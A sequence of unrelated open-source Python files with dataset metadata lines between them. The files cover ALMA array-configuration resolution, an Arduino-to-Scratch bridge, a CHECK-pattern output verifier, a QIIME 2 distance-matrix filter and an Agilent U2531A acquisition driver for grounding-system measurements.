self.minAR[0] = resCompact * 0.8
self.maxAR[0] = self.resOriginal * 1.1
if self.resOriginal < resExt:
self.minAR[0] = self.resOriginal
self.maxAR[0] = resExt * 1.1
if self.nof12m == 2:
## estimate the array 1
self.minAR[0] = self.resOriginal * 0.7
self.maxAR[0] = self.resOriginal * 1.1
minArr = 1000
maxArr = 0
for s in resLas:
for arr in self.array:
if s == self.array[arr]:
if arr < minArr:
minArr = arr
if arr > maxArr:
maxArr = arr
b0 = self.data[arr][1][zenith] * scalingFrequency
b1 = self.data[arr][2][zenith] * scalingFrequency
res = math.sqrt(b0*b1)
if res > self.maxAR[1]:
self.maxAR[1] = res
if res < self.minAR[1]:
self.minAR[1] = res
if minArr > 0:
b0 = self.data[minArr-1][1][zenith] * scalingFrequency
b1 = self.data[minArr-1][2][zenith] * scalingFrequency
res = math.sqrt(b0*b1) * 0.9
self.maxAR[1] = res
if self.maxAR[1] == self.minAR[1]:
b0 = self.data[maxArr+1][1][zenith] * scalingFrequency
b1 = self.data[maxArr+1][2][zenith] * scalingFrequency
res = math.sqrt(b0*b1) * 1.3
self.minAR[1] = res
## check on the highest spatial resolution
if self.resOriginal < resExt:
self.minAR[0] = self.resOriginal * 0.7
self.maxAR[0] = resExt * 1.1
def fixConfiguration(self,result,nof12m):
" Fix the configurations"
lasC = []
extC = []
ext = 0
las = 0
for s in result[0]:
if s != '':
ext += 1
extC.append(s)
for s in result[1]:
if s != '':
las += 1
lasC.append(s)
if nof12m == 2 and las == 0 :
if extC[-1] == 'C34-7' :
resN = ['C34-6']
elif extC[-1] == 'C34-6':
resN = ['C34-5']
elif extC[-1] == 'C34-5' :
resN = ['C34-4']
elif extC[-1] == 'C34-4' :
resN = ['C34-3']
elif extC[-1] == 'C34-3' :
resN = ['C34-2']
elif extC[-1] == 'C34-2' :
resN = ['C34-1']
result[1]= resN
return(result)
########################################################################3
def silentRun(self):
self.silent = False
def run(self):
"Run the matching array"
TP="N"
self.set_res(float(self.args[1]))
self.set_las(float(self.args[2]))
self.set_frequency(float(self.args[3]))
self.set_declination(float(-23.0))
self.set_aca((self.args[4]))
self.set_12m(int(self.args[5]))
if self.lasObs == 0.:
self.set_pointSource(True)
strOut = "### arrayResolution2p \n"
strOut += "### Version: %s \n"%(__version__)
strOut += "### Input \n"
if self.pointSource:
strOut += "# Point Source ! \n"
strOut += "# Spatial Resolution: %s \n"%(self.args[1])
strOut += "# LAS: %s \n"%(self.args[2])
strOut += "# Frequency: %s GHz \n"%(self.args[3])
# strOut += "# Declination: %s \n"%(self.args[4])
strOut += "# 7-m Array (Y/N): %s \n"%(self.args[4])
strOut += "# Num. of 12-m Array: %d \n\n"%(self.nof12m)
strOut += "### Output (target frequency) \n"
strOut += "### Using CASA simulation with natural weighting (slightly different of THB)"
if self.silent:
print(strOut)
notFound = True
maxTry = 100
nTry = 1
deltaFudgeFactor = 0.05
fudgeFactor = 1.0
res , TP , notFound , notFoundLAS = self.find_array3(verbose = True)
while (notFound and nTry < maxTry and notFoundLAS and self.acaUse == 'N' ):
nTry += 1
notFound = False
fudgeFactor += deltaFudgeFactor
self.resObs *= fudgeFactor
self.lasObs /= fudgeFactor
res , TP , notFound , notFoundLAS = self.find_array3()
while (notFound and nTry < maxTry ):
nTry += 1
notFound = False
fudgeFactor += deltaFudgeFactor
self.resObs *= fudgeFactor
res , TP , notFound , notFoundLAS = self.find_array3()
if nTry > 1 :
if self.silent:
print("# No array configuration found, fudge factor applied (Tol = %3.0f %%)"%((fudgeFactor-1.)*100.))
if notFound and nTry > 1:
if self.silent:
print("# No array configuration found, even with fudge factor, problem ...")
strOutRes = ""
strOutLAS = ""
pcomR = ""
pcomL = ""
if self.silent:
print ""
print("### Results - AR - LAS")
if notFound :
if self.silent:
print ",,,,,"
else:
for s in res[0]:
strOutRes += pcomR+s
pcomR = ","
strOutRes += ","
strOutRes += TP
for s in res[1]:
strOutLAS += pcomL+s
pcomL = ","
strOutLAS += ","
strOutLAS += TP
# if self.silent:
# print strOutLAS
# print strOutRes
# print res
resN = self.fixConfiguration(res, self.nof12m)
# print resN
self.matchAR(resN[1])
if self.nof12m == 1:
#print("One Array:")
#print("Min Resolution : %5.2f "%(self.minAR[0]))
#print("Max Resolution : %5.2f "%(self.maxAR[0]))
return self.minAR[0], self.maxAR[0], 0, 0
elif self.nof12m == 2:
#print("Extended Array:")
#print("Min Resolution minAR_e %5.2f "%(self.minAR[0]))
#print("Max Resolution maxAR_e %5.2f "%(self.maxAR[0]))
#print("Compact Array:")
#print("Min Resolution minAR_c %5.2f "%(self.minAR[1]))
#print("Max Resolution maxAR_c %5.2f "%(self.maxAR[1]))
return self.minAR[0], self.maxAR[0], self.minAR[1], self.maxAR[1]
#====== Standalone program =========================
if __name__=="__main__":
arg = sys.argv
if len(arg) < 6:
print "Arguments missing \n"
print "The correct syntax is:"
print "python arrayResolution2p.py RES (arcsec) LAS (arcsec) FREQ (GHz) Y/N (ACA) numberofarray \n"
print "Example:"
print "python arrayResolution2p.py 0.2 2.0 640. Y 1 ## if LAS = 0. assumes a point source"
else :
a = arrayRes(arg)
a.run()
| gpl-2.0 | -7,200,967,021,325,123,000 | 30.173797 | 133 | 0.46908 | false |
Sayter99/86Scratch | Helpers/86Scratch/s2a_fm.py | 1 | 4575 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 25 13:17:15 2013
@author: Alan Yorinks
Copyright (c) 2013-14 Alan Yorinks All right reserved.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import sys
from PyMata.pymata import PyMata
import scratch_http_server
from scratch_command_handlers import ScratchCommandHandlers
import time
#noinspection PyBroadException
def s2a_fm():
"""
This is the "main" function of the program.
It will instantiate PyMata for communication with an Arduino micro-controller
and the command handlers class.
It will the start the HTTP server to communicate with Scratch 2.0
@return : This is the main loop and should never return
"""
# total number of pins on arduino board
total_pins_discovered = 0
# number of pins that are analog
number_of_analog_pins_discovered = 0
print 's2a_fm version 1.5 Copyright(C) 2013-14 Alan Yorinks All Rights Reserved '
# get the com_port from the command line or default if none given
# if user specified the com port on the command line, use that when invoking PyMata,
# else use '/dev/ttyACM0'
if len(sys.argv) == 2:
com_port = str(sys.argv[1])
else:
com_port = '/dev/ttyACM0'
try:
# instantiate PyMata
firmata = PyMata(com_port) # pragma: no cover
except Exception:
print 'Could not instantiate PyMata - is your Arduino plugged in?'
return
# determine the total number of pins and the number of analog pins for the Arduino
# get the arduino analog pin map
# it will contain an entry for all the pins with non-analog set to firmata.IGNORE
firmata.analog_mapping_query()
capability_map = firmata.get_analog_mapping_request_results()
firmata.capability_query()
print "Please wait for Total Arduino Pin Discovery to complete. This can take up to 30 additional seconds."
# count the pins
for pin in capability_map:
total_pins_discovered += 1
# non analog pins will be marked as IGNORE
if pin != firmata.IGNORE:
number_of_analog_pins_discovered += 1
# instantiate the command handler
scratch_command_handler = ScratchCommandHandlers(firmata, com_port, total_pins_discovered,
number_of_analog_pins_discovered)
# wait for a maximum of 30 seconds to retrieve the Arduino capability query
start_time = time.time()
pin_capability = firmata.get_capability_query_results()
while not pin_capability:
if time.time() - start_time > 30:
print ''
print "Could not determine pin capability - exiting."
            firmata.close()
            return
# keep sending out a capability query until there is a response
pin_capability = firmata.get_capability_query_results()
time.sleep(.1)
# we've got the capability, now build a dictionary with pin as the key and a list of all the capabilities
# for the pin as the key's value
pin_list = []
total_pins_discovered = 0
for entry in pin_capability:
# bump up pin counter each time IGNORE is found
if entry == firmata.IGNORE:
scratch_command_handler.pin_map[total_pins_discovered] = pin_list
total_pins_discovered += 1
pin_list = []
else:
pin_list.append(entry)
print "Arduino Total Pin Discovery completed in %d seconds" % (int(time.time() - start_time))
try:
# start the server passing it the handle to PyMata and the command handler.
scratch_http_server.start_server(firmata, scratch_command_handler)
except Exception:
firmata.close()
return
except KeyboardInterrupt:
# give control back to the shell that started us
firmata.close()
return
if __name__ == "__main__":
s2a_fm() | mit | -6,333,871,453,249,498,000 | 34.75 | 111 | 0.676066 | false |
alalek/cmake_utils | tests/checkoutput.py | 1 | 12432 | #!/bin/env python3
import os
import string
import sys
import re
from pprint import pprint
class CheckException(Exception):
pass
CHECK_SIMPLE = ''
CHECK_NEXT = '-NEXT'
CHECK_SAME = '-SAME'
CHECK_NOT = '-NOT'
CHECK_BETWEEN = '-BETWEEN' # check without order
CHECK_LABEL = '-LABEL'
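# Check-file syntax sketch (derived from the directives handled below; the matched
# text is illustrative):
#   ; CHECK: foo{{[0-9]+}}      -- {{...}} embeds a regular expression
#   ; CHECK-NEXT: bar           -- must match the very next line
#   ; CHECK-SAME: baz           -- must match on the same line as the previous check
#   ; CHECK-NOT: qux            -- must not appear before the next positive match
#   ; CHECK-BETWEEN: e1         -- must appear (in any order) before the next CHECK
#   ; CHECK: id=[[ID:[0-9]+]]   -- [[NAME:regex]] captures a variable, [[NAME]] reuses it
#   ; CHECK-LABEL: section      -- splits the rules into independent blocks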
def _apply_check(c, m, variables, nline):
c['found'] = True
c['nline'] = nline
variables.update(m.groupdict())
_var_entry_re = re.compile(r'(?P<name>[A-Za-z0-9_]+)(:(?P<regexp>.+))?')
def _build_pattern(content, variables):
pattern = ''
pos = 0
while pos < len(content):
        re_start = content.find('{{', pos)
        var_start = content.find('[[', pos)
if re_start != -1 and var_start != -1:
if re_start < var_start:
var_start = -1
else:
re_start = -1
if re_start != -1:
            re_end = content.find('}}', re_start)
assert re_end != -1, "Invalid {{...}} entry"
pattern += re.escape(content[pos:re_start])
pattern += content[re_start+2:re_end]
pos = re_end + 2
elif var_start != -1:
            var_end = content.find(']]', var_start)
assert var_end != -1, "Invalid [[...]] entry"
pattern += re.escape(content[pos:var_start])
var_entry = content[var_start+2:var_end]
m = _var_entry_re.match(var_entry)
assert m
name = m.group('name')
regexp = m.group('regexp')
if regexp is None:
assert name in variables, 'Variable "%s" is not found' % name
v = variables[name]
pattern += re.escape(v)
else:
pattern += r'(?P<' + name + r'>' + regexp + ')'
pos = var_end + 2
else:
pattern += re.escape(content[pos:])
break
pattern = r'(^| |\t)' + pattern + r'($| |\t)'
return pattern
class Checker():
''' Output check prefix '''
prefix = 'CHECK'
def __init__(self, prefix=None, file=None, lines=None):
if prefix is not None:
self.prefix = prefix
self._build_regexp()
if file is not None:
assert isinstance(file, str)
self.build_from_file(file)
if lines is not None:
self.build_from_lines(lines)
def _build_regexp(self):
assert isinstance(self.prefix, str)
self.check_re = re.compile(
r'^[^A-Za-z0-9]*' + re.escape(self.prefix) +
'(?P<type>(|-NEXT|-SAME|-NOT|-BETWEEN|-LABEL)): ?(?P<content>.*)$'
)
def build_from_file(self, filePath):
if not os.path.exists(filePath):
raise Exception("Can't find file: " + filePath)
raw_checks = []
with open(filePath, "rb") as f:
for line in f:
if isinstance(line, bytes):
line = line.decode('utf-8')
if len(line) > 0 and line[-1] == '\r':
line = line[:-1]
if len(line) > 0 and line[-1] == '\n':
line = line[:-1]
if len(line) == 0:
continue
m = self.check_re.match(line)
if m:
raw_checks.append(dict(type=m.group('type'), content=m.group('content')))
self._compile(raw_checks)
def build_from_lines(self, lines):
raw_checks = []
for line in lines:
if isinstance(line, bytes):
line = line.decode('utf-8')
if len(line) > 0 and line[-1] == '\r':
line = line[:-1]
if len(line) > 0 and line[-1] == '\n':
line = line[:-1]
if len(line) == 0:
continue
m = self.check_re.match(line)
if m:
raw_checks.append(dict(type=m.group('type'), content=m.group('content')))
self._compile(raw_checks)
checks_list = None # list of separated check blocks
nrules = 0
def _compile(self, raw_checks):
if self.checks_list is None:
self.checks_list = []
current_check_sequence = []
current_label = None
for c in raw_checks:
self.nrules += 1
type = c['type']
if type == CHECK_SIMPLE:
pass
elif type == CHECK_NEXT:
assert len(current_check_sequence) > 0, "Invalid usage of NEXT check"
elif type == CHECK_SAME:
assert len(current_check_sequence) > 0, "Invalid usage of SAME check"
elif type == CHECK_NOT:
pass
elif type == CHECK_BETWEEN:
pass
elif type == CHECK_LABEL:
if len(current_check_sequence) > 0:
self.checks_list.append(dict(label=current_label, sequence=current_check_sequence))
current_check_sequence = []
                current_label = c['content'].strip()
                if len(current_label) == 0:
                    current_label = None
continue
else:
assert False, 'Invalid check type: ' + type
current_check_sequence.append(dict(content=c['content'], type=type))
if len(current_check_sequence) > 0:
self.checks_list.append(dict(label=current_label, sequence=current_check_sequence))
def _validate(self, lines, check_sequence):
variables = {}
def found(c, m, nline):
return _apply_check(c, m, variables, nline)
def get_regexp(content):
return re.compile(_build_pattern(content, variables))
nline = -1
nline_prev = -1
not_check = None
between_checks = []
for c in check_sequence:
if c['type'] == CHECK_SIMPLE:
nline += 1
while nline < len(lines):
m = get_regexp(c['content']).search(lines[nline])
if m is not None:
found(c, m, nline)
break
nline += 1
else:
raise CheckException("Failed check: " + c['content'])
elif c['type'] == CHECK_NEXT:
nline += 1
if not nline < len(lines):
raise CheckException("EOF for NEXT check: " + c['content'])
m = get_regexp(c['content']).search(lines[nline])
if m is not None:
found(c, m, nline)
else:
raise CheckException("Failed NEXT check: " + c['content'] + '\n\tline: ' + lines[nline])
elif c['type'] == CHECK_SAME:
m = get_regexp(c['content']).search(lines[nline])
if m is not None:
found(c, m, nline)
else:
raise CheckException("Failed SAME check: " + c['content'] + '\n\tline: ' + lines[nline])
elif c['type'] == CHECK_NOT:
assert len(between_checks) == 0, "Invalid mix of NOT and BETWEEN checks: " + c['content']
not_check = c
continue
elif c['type'] == CHECK_BETWEEN:
assert not_check is None, "Invalid mix of NOT and BETWEEN checks: " + c['content']
between_checks.append(c)
continue
else:
assert False, "Internal error"
if not_check is not None:
lastline = nline
if c['type'] == CHECK_SAME:
lastline = nline + 1
for nl in range(nline_prev, lastline):
m = get_regexp(not_check['content']).search(lines[nl])
if m is not None:
raise CheckException("Failed NOT check: " + not_check['content'] + '\n\tline: ' + lines[nline])
not_check = None
if len(between_checks) > 0:
regexp = []
for c in between_checks:
regexp.append(get_regexp(c['content']))
nfound = 0
for nl in range(nline_prev, nline):
for i, r in enumerate(regexp):
m = r.search(lines[nl])
if m is not None:
found(between_checks[i], m, nl)
nfound += 1
break
if nfound != len(between_checks):
failed = []
for c in between_checks:
if 'found' not in c:
failed.append(c['content'])
raise CheckException("Failed BETWEEN checks:\n\t" + failed.join('\n\t'))
between_checks = []
nline_prev = nline
def validate(self, lines):
filtered_lines = [] # ignore lines with CHECK directives
for line in lines:
if isinstance(line, bytes):
line = line.decode('utf-8')
if len(line) > 0 and line[-1] == '\r':
line = line[:-1]
if len(line) > 0 and line[-1] == '\n':
line = line[:-1]
if len(line) == 0:
continue
m = self.check_re.match(line)
if m is None:
filtered_lines.append(line)
errors = 0
for check_sequence in self.checks_list:
try:
self._validate(filtered_lines, check_sequence['sequence'])
            except CheckException as e:
msg = '[%s] %s' % (check_sequence['label'] or '-', e.args[0])
print(msg)
errors += 1
return errors
def __str__(self):
return 'checks %d, rules %d' % (len(self.checks_list), self.nrules)
def read_lines(file):
lines = []
for line in file:
if isinstance(line, bytes):
line = line.decode('utf-8')
        if len(line) > 0 and line[-1] == '\n':
            line = line[:-1]
        if len(line) > 0 and line[-1] == '\r':
            line = line[:-1]
lines.append(line)
return lines
def _test():
lines = '''
; CHECK: foo
; CHECK-NEXT: foo3
foo3
foo
foo3
// CHECK: bar1
// CHECK-SAME: baz
bar1 baz
# CHECK: bar2
# CHECK-NOT: foo
# CHECK-SAME: baz
bar2 baz
// CHECK: foo
// CHECK-BETWEEN: e1
// CHECK-BETWEEN: e2
// CHECK-BETWEEN: e3
// CHECK: end
foo
e2
q
e1
q
e3
q
end
'''.split('\n')
c = Checker(lines=lines)
errors1 = c.validate(lines)
print('errors1: %d' % errors1)
lines = '''
; CHECK: foo{{.+}}
foo3
; CHECK: foo[[ID:[0-9]+]]
; CHECK-NEXT: bar[[ID]]
foo3
bar3
'''.split('\n')
c = Checker(lines=lines)
errors2 = c.validate(lines)
print('errors2: %d' % errors2)
if errors1 + errors2 == 0:
print('OK')
return 0
else:
print('FAILED')
return 1
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description='Testsuite utility to verify output produced via stdin or separate file')
parser.add_argument('--version', action='version', version='checkoutput 0.0')
parser.add_argument('--verbose', '-v', action='count')
parser.add_argument('-c', '--check_file', required=False,
help='file with rules to check (defaults to input file)')
parser.add_argument('-i', '--input_file', metavar='filename',
help='input file to check (defaults to stdin)')
parser.add_argument('--prefix', metavar='prefix', default='CHECK',
help='prefix for check pattern')
parser.add_argument('--test', action='store_true', help='run self test')
args = parser.parse_args()
if args.test:
sys.exit(_test())
c = Checker(prefix=args.prefix)
if args.input_file:
with open(args.input_file, 'rb') as f:
verify_lines = read_lines(f)
else:
verify_lines = read_lines(sys.stdin)
if args.check_file:
c.build_from_file(args.check_file)
else:
c.build_from_lines(verify_lines)
if c.nrules == 0:
sys.exit("Check rules is empty")
if len(verify_lines) == 0:
sys.exit("Input is empty")
errors = c.validate(verify_lines)
if errors > 0:
sys.exit('%s: errors %d' % (c, errors))
sys.exit(0)
| mit | 5,228,359,323,008,180,000 | 31.375 | 119 | 0.492761 | false |
maxvonhippel/q2-diversity | q2_diversity/_filter.py | 1 | 1145 | # ----------------------------------------------------------------------------
# Copyright (c) 2016-2017, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import skbio
import qiime2
def filter_distance_matrix(distance_matrix: skbio.DistanceMatrix,
metadata: qiime2.Metadata,
where: str=None,
exclude_ids: bool=False) -> skbio.DistanceMatrix:
ids_to_keep = metadata.ids(where=where)
if exclude_ids:
ids_to_keep = set(distance_matrix.ids) - set(ids_to_keep)
# NOTE: there is no guaranteed ordering to output distance matrix because
# `ids_to_keep` is a set, and `DistanceMatrix.filter` uses its iteration
# order.
try:
return distance_matrix.filter(ids_to_keep, strict=False)
except skbio.stats.distance.DissimilarityMatrixError:
raise ValueError(
"All samples were filtered out of the distance matrix.")
| bsd-3-clause | -3,368,935,227,757,453,300 | 41.407407 | 78 | 0.571179 | false |
lamotriz/sistemas-de-aterramento | src/agilent_u2531a.py | 1 | 14700 | # -*- coding: utf-8 -*-
# Communication with the Agilent U2531A board
#
# UFC - Universidade Federal do Ceará
#
# Authors:
#    Felipe Bandeira da Silva
#    Francisco Alexander
#
from __future__ import division
import platform
#if platform.system() == 'Windows':
# import visa
#else:
# import visa_linux_emulation as visa
try:
import visa
except:
    # During a normal installation using NSIS, the Windows PATH had not yet
    # been updated with Python, so pip could not be run during the install to
    # fetch "pyvisa", which by nature has several dependencies that pip
    # handles transparently. Therefore an internet connection is required the
    # first time the program is used.
    #
    # pyvisa 1.4 is required for everything to work correctly.
#import pip
#pip.main(['install', 'pyvisa'])
import subprocess
    print u"warning: installing PyVISA 1.4"
subprocess.call(['pip', 'install', 'PyVISA==1.4'])
    print u"warning: installation finished"
import visa
import matplotlib.pyplot as plt
from time import sleep, time, asctime, localtime
import numpy as np
###############################################################################
# Correction constants. The same values used by the LabVIEW program.
###############################################################################
FATOR_CORRECAO_TENSAO = 100
FATOR_CORRECAO_CORRENTE = 2.71
# 0 - do not show messages
# 1 - show debug messages
DEBUG = 0
# A small spurious pulse (pure noise) appears at the start of the
# acquisition. To display the signal correctly the number of acquired
# points had to be increased, which makes each acquisition take longer.
#QUANTIDADE_PONTOS = 50000
QUANTIDADE_PONTOS = 800000
###############################################################################
# testBit() returns a nonzero result, 2**offset, if the bit at 'offset' is one.
def testBit(int_type, offset):
mask = 1 << offset
return(int_type & mask)
# setBit() returns an integer with the bit at 'offset' set to 1.
def setBit(int_type, offset):
mask = 1 << offset
return(int_type | mask)
# clearBit() returns an integer with the bit at 'offset' cleared.
def clearBit(int_type, offset):
mask = ~(1 << offset)
return(int_type & mask)
# toggleBit() returns an integer with the bit at 'offset' inverted, 0 -> 1 and 1 -> 0.
def toggleBit(int_type, offset):
mask = 1 << offset
return(int_type ^ mask)
def lerEndian(data):
"""
    Converts a data sequence into 2-byte values.
    The input sequence is given in little-endian format,
    with the 13th bit acting as the carry.
    Input:
        data = raw string with the block of bytes
    Output:
        t = number of decoded values
        v = the values in a vector
"""
raw = data[10:]
valores = []
passo = 0
for i in raw:
if passo == 0:
lsb = i
passo = 1
elif passo == 1:
msb = i
passo = 0
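            # combine the two bytes (little-endian) and drop the two lowest
            # bits to recover the 14-bit ADC sample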
num = ((ord(msb)<<8)+(ord(lsb)))>>2
#print hex(num)
valores.append(num)
return [len(valores), valores]
def ler2Endian(data):
"""
    Reads a block of bytes composed of two simultaneous channel readings.
"""
raw = data[10:]
A = []
B = []
passo = 0
for i in raw:
if passo == 0:
lsb = i
passo = 1
elif passo == 1:
msb = i
passo = 2
A.append(((ord(msb)<<8)+(ord(lsb)))>>2)
elif passo == 2:
lsb = i
passo = 3
elif passo == 3:
msb = i
passo = 0
B.append(((ord(msb)<<8)+(ord(lsb)))>>2)
return [len(A), A, B]
def convBIP(raw, range_ad=10, resolution=14):
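    # Convert raw ADC samples to volts for a bipolar input range.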
v = []
for i in raw:
v.append( (2*i)/(2**resolution) * range_ad )
return v
def convUNI(raw, range_ad=10, resolution=14):
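    # Convert raw ADC samples to volts for a unipolar input range.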
v = []
for i in raw:
        # if bit 13 of the word is 1 then the number is "negative";
        # the unipolar conversion is given by
        # MAX   = 1FFF
        # MAX/2 = 0000
        # 0     = 2000
if testBit(i, 13) > 0:
valor = clearBit(i, 13) - (2**14)/2
v.append( (valor/(2**resolution) + 0.5)*range_ad )
else:
v.append( (i/(2**resolution) + 0.5)*range_ad )
return v
def lerTensaoCorrente(ag):
"""
    Reads two channels simultaneously:
    channel 101 (current) and channel 102 (voltage).
    """
    # reset the acquisition board
ag.write("*CLS")
ag.write("*RST")
    ag.write("ROUT:ENAB 0,(@103, 104)") # disable channels 103 and 104
    ag.write("ROUT:ENAB 1,(@101, 102)") # enable channels 101 and 102
    ag.write("ROUT:CHAN:RANG 10,(@101, 102)") # same range as the National Instruments program
    ag.write("ROUT:CHAN:POL UNIP,(@101, 102)") # unipolar
    ag.write("ACQ:SRAT 2000000") # sampling rate
    #ag.write("ACQ:POIN 2000000")
    #ag.write("ACQ:POIN 50000") # number of points per acquisition
ag.write("ACQ:POIN %d" % QUANTIDADE_PONTOS)
    #####################
    # start acquisition #
    #####################
ag.write("DIG")
disparaTensao(ag)
#ag.write("DIG")
while True:
ag.write("WAV:COMP?")
if ag.read() == 'YES':
break
        sleep(0.2) # wait a while until the sample is ready
    # A small change in the capacitor of the first 555 means that set and
    # reset need a longer time for both to take place.
sleep(.2)
retiraTensao(ag)
ag.write("WAV:DATA?")
dados = ag.read()
t, I, V = ler2Endian(dados)
V = convUNI(V, 10)
I = convUNI(I, 10)
return [dados, V, I]
def lerTensao(ag):
"""
    Reads only the source voltage channel (channel 102),
    with the full set/reset trigger sequence.
"""
# reset
ag.write("*CLS")
ag.write("*RST")
    # start reading channel 102 (voltage)
ag.write("ROUT:ENAB 0,(@103, 101, 104)")
ag.write("ROUT:ENAB 1,(@102)")
    ag.write("ROUT:CHAN:RANG 10,(@102)") # same range as the National Instruments program
ag.write("ROUT:CHAN:POL UNIP,(@102)")
ag.write("ACQ:SRAT 2000000")
#ag.write("ACQ:POIN 2000000")
#ag.write("ACQ:POIN 50000")
    # A small spurious pulse (pure noise) appears at the start of the
    # acquisition. To display the signal correctly the number of acquired
    # points had to be increased, which makes each acquisition take longer.
ag.write("ACQ:POIN %d" % (QUANTIDADE_PONTOS))
    # start acquisition
ag.write("DIG")
disparaTensao(ag)
while True:
ag.write("WAV:COMP?")
if ag.read() == 'YES':
break
sleep(0.5)
ag.write("WAV:DATA?")
dados = ag.read()
sleep(.2)
retiraTensao(ag)
#print dados
t, R = lerEndian(dados)
V = convUNI(R, 10)
plt.grid()
plt.plot(range(0, t), V)
plt.show()
return t, V
def lerCorrente(ag):
"""
    Reads only the source current channel (channel 101),
    with the full set/reset trigger sequence.
"""
# reset
ag.write("*CLS")
ag.write("*RST")
    # start reading channel 101 (current)
ag.write("ROUT:ENAB 0,(@103, 102, 104)")
ag.write("ROUT:ENAB 1,(@101)")
ag.write("ROUT:CHAN:RANG 10,(@101)")
ag.write("ROUT:CHAN:POL UNIP,(@101)")
ag.write("ACQ:SRAT 2000000")
ag.write("ACQ:POIN 2000000")
    # start acquisition
ag.write("DIG")
disparaTensao(ag)
while True:
ag.write("WAV:COMP?")
if ag.read() == 'YES':
break
sleep(0.5)
ag.write("WAV:DATA?")
dados = ag.read()
sleep(.2)
retiraTensao(ag)
#print dados
t, R = lerEndian(dados)
V = convUNI(R, 10)
plt.grid()
plt.plot(range(0, t), V)
plt.show()
return t, V
def lerCanal103(ag):
"""
    This channel was used for the initial analog-to-digital conversion
    tests and is no longer needed.
    The voltage and current reading functions are identical to this one;
    only the channel changes.
"""
# reset
ag.write("*CLS")
ag.write("*RST")
    # start reading channel 103
ag.write("ROUT:ENAB 0,(@101, 102, 104)")
ag.write("ROUT:ENAB 1,(@103)")
ag.write("ROUT:CHAN:RANG 10,(@103)")
#ag.write("ROUT:CHAN:POL BIP,(@103)")
ag.write("ROUT:CHAN:POL UNIP,(@103)")
ag.write("ACQ:SRAT 2000000")
ag.write("ACQ:POIN 2000000")
    # start acquisition
ag.write("DIG")
    # wait for completion
disparaTensao(ag)
while True:
ag.write("WAV:COMP?")
if ag.read() == 'YES':
break
sleep(0.1)
ag.write("WAV:DATA?")
dados = ag.read()
sleep(.2)
retiraTensao(ag)
#print dados
t, R = lerEndian(dados)
V = convUNI(R)
plt.grid()
plt.plot(range(0, t), V)
return t, V
def disparaTensao(ag):
"""
    Sends a high-voltage pulse to the grounding system by triggering
    the first 555.
    Pulses must not be sent within a short time interval, since the
    source was not designed for that, so care must be taken with
    sequential triggering.
    SET   - pin 68 on the U2901-60602 board
    RESET - pin 34 on the U2901-60602 board
"""
ag.write("CONF:DIG:DIR OUTP,(@501)")
ag.write("SOUR:DIG:DATA 1,(@501)")
return 0
def retiraTensao(ag):
"""
    Resets the source, enabling it to send a new
    high-voltage pulse.
"""
ag.write("CONF:DIG:DIR OUTP,(@501)")
    ag.write("SOUR:DIG:DATA 0,(@501)") # disable set
    sleep(0.1) # wait a moment for the reset
    ag.write("SOUR:DIG:DATA 2,(@501)") # reset the source
    sleep(0.1) # wait a moment to reach the idle state
    ag.write("SOUR:DIG:DATA 0,(@501)") # go idle
return 0
def pltTensaoCorrente(V, I):
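    # Plot voltage (top subplot) and current (bottom subplot) of the last
    # acquisition in a single figure.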
t1 = np.arange(0, len(V))
plt.figure(1)
plt.title("Leitura do U2531A")
plt.subplot(211)
plt.plot(t1, V)
plt.subplot(212)
plt.plot(t1, I)
plt.show()
def aplicaCorrecoes(V, I):
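    # Apply the correction factors that scale the acquired voltage and
    # current to their real values.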
V = np.array(V)
V = FATOR_CORRECAO_TENSAO * V
I = np.array(I)
I = FATOR_CORRECAO_CORRENTE * I
return [V, I]
def sequenciaAquisicoes(ag, quantidade, local="C:\\Temp", rotulo = '0'):
"""
    Performs a sequential acquisition of the voltage and current channels.
    ag = object used to control the board
"""
    print "Starting sequential acquisition"
    print "Instrument = ", ag
    print "quantity = ", quantidade
    print "Start time = ", asctime()
tempoInicio = time()
contagem = quantidade
plt.figure(1)
while quantidade > 0:
        print "Current = ", quantidade
tempoIndividual = time()
        # start acquisition
raw, V, I = lerTensaoCorrente(ag)
V, I = aplicaCorrecoes(V, I)
        # it is not a good idea to plot this way
#pltTensaoCorrente(V, I)
plt.subplot(211)
plt.plot(np.arange(0, len(V)), V)
plt.subplot(212)
plt.plot(np.arange(0, len(I)), I)
salvaTensaoTXT(local, rotulo, contagem-quantidade+1, V)
salvaCorrenteTXT(local, rotulo, contagem-quantidade+1, I)
print "Individual = ", time()-tempoIndividual
quantidade -=1
total = time()-tempoInicio
    print 'Completed in [sec]: ', total
plt.show()
return 0
def salvaTensaoTXT(local, rotulo, posicao, V):
"""
    Saves the voltage vector to a file with a name formatted for it
"""
nomeCompleto = local+"\\"+rotulo+"V"+str(posicao)+".txt"
return salvaTXT(nomeCompleto, V)
def salvaCorrenteTXT(local, rotulo, posicao, I):
"""
    Saves the current vector to a file with a name formatted for it
"""
nomeCompleto = local+"\\"+rotulo+"I"+str(posicao)+".txt"
return salvaTXT(nomeCompleto, I)
def salvaTXT(caminhoCompleto, vetor):
"""
    Saves the values of a vector to a txt file,
    where the first column gives the index and the second
    column gives the value for that index.
"""
try:
arquivo = open(caminhoCompleto, 'w')
except:
        print 'error: could not write to the file'
print ' : ', caminhoCompleto
return -1
    # write "index value" pairs, one per line, as described in the docstring
    for i in range(len(vetor)):
        string = "%d %f\n" % (i, float(vetor[i]))
        arquivo.write(string)
arquivo.close()
    # write finished successfully
return 0
def buscaAgilent():
"""
    Finds the instrument connected to the computer's USB port,
    returning the object to be used by the control functions
    of the Agilent acquisition board.
"""
    listaInstrumentos = visa.get_instruments_list() # get the list of instruments connected to the computer
    listaAgilent = listaInstrumentos[0] # take the first instrument
    print 'Instrument list:'
    print listaAgilent # the instrument is expected to be an Agilent one
    ag = visa.instrument(listaAgilent) # create an object to be handled and passed to the other functions
identificacao = ag.ask("*IDN?")
print identificacao
return ag
###############################################################################
# MAIN #
###############################################################################
if __name__ == '__main__':
    print 'Agilent U2531A'
